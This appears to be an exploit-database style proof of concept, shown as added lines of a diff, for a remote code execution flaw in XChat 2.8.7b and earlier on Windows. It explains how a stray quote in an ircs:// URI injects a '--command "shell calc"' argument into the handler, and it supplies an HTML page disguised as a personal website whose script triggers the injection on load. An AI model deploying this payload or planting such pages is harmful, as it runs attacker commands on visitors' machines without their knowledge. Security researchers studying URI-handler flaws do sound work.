+The issue arises because of improper handling of the 'ircs://' URI.
+
+XChat 2.8.7b and prior versions are vulnerable to the issue. 
+
+##################################################################################################################
+#
+# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
+# Vendor : http://xchat.org/
+# Affected Os : Windows *
+# Risk : critical
+#
+# This bug is related to the URI Handler vulnerability but the approch is a bit different.
+# We don't use any % or  ../../../ as the others related bugs, just a single "
+# According to the registry , when the IRCS:// URI is called , the command launched is :
+# C:\Program Files\xchat\xchat.exe --existing --url="%1"
+#
+# The xchat --help option tells us :
+# " --command=COMMAND :Send a command to existing xchat "
+#
+# So we add a simple " at the end of the URL and we're in business ?
+# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
+#
+# Note: The victim needs to be connected to an irc server , and also need IE * .
+#
+#
+#
+# Greetz: French/Quebec community, http://spiritofhack.net/
+#
+# "If in times like theses you can talk about individual freedoom, you're propably a terrorist"
+#
+# Poc: this only launch the calc, sky is the limit passed this point.
+<html>
+<head><title>Welcome to my personal website</title></head>
+<body>
+<script>document.location='ircs://blabla@3.3.3.3" --command "shell calc"'</script>
+</body>
+</html>